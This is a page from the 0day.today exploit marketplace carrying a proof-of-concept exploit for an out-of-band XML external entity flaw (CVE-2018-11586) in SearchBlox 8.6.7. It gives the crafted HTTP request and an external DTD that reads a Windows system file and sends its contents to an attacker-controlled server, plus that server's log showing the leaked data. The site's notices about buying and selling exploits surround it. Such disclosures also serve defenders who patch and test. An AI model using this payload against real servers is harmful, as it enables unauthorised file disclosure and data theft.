0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SearchBlox 8.6.7 - XML External Entity Injection Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE) # Exploit Author: Ahmet GUREL, Canberk BOLAT # Software Link: https://www.searchblox.com/ # Version: < = SearchBlox Version 8.6.7 # Platform: Java # Tested on: Windows # CVE: CVE-2018-11586 # 1. DETAILS An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Reference: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing # 2. PoC: XML external entity (XXE) vulnerability in /searchblox/api/rest/status in SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. HTTP Request: _____________ GET /searchblox/api/rest/status HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci; XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5; AdsOnSearchPage=5 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 140 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE xxe [ <!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd"> %dtd; %all; %send;]> #Ext.dtd File : _______________ <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % file SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.1.2:7000/?%file; '>"> %all; #HTTP Response: _______________ Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000 Serving HTTP on 0.0.0.0 port 7000 ... 192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 - 192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1 HTTP/1.1" 200 - # 0day.today [2024-11-16] #